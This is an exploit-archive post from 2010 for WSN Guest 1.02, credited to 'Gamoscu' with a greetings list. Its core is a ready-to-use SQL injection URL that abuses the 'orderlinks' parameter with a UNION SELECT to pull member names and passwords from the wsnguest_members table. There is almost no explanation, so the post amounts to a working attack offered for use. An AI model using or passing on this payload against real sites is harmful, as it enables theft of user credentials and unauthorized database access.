[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WSN Guest 1.02 (orderlinks) SQL Injection Vulnerability
# Published : 2010-02-13
# Author : Gamoscu
# Previous Title : StatCounteX 3.1 Multiple Vulnerabilities
# Next Title : ZeusCMS v0.2 (DBD/LFI) Multiple Vulnerabilities
###########################
Author : Gamoscu
Homepage : http://www.1923turk.com
Blog : http://gamoscu.wordpress.com/
Script : WSN Guest 1.02
Download : http://scripts.webmastersite.net/wsnguest/wsnguest.zip
###########################
Exploat :index.php?page=20&orderlinks=SQL
http://server/wsnguest/index.php?page=20&orderlinks=+and+1=0+union+select+name,null,null,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wsnguest_members--
##############################################################
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################
Veda Turlary :)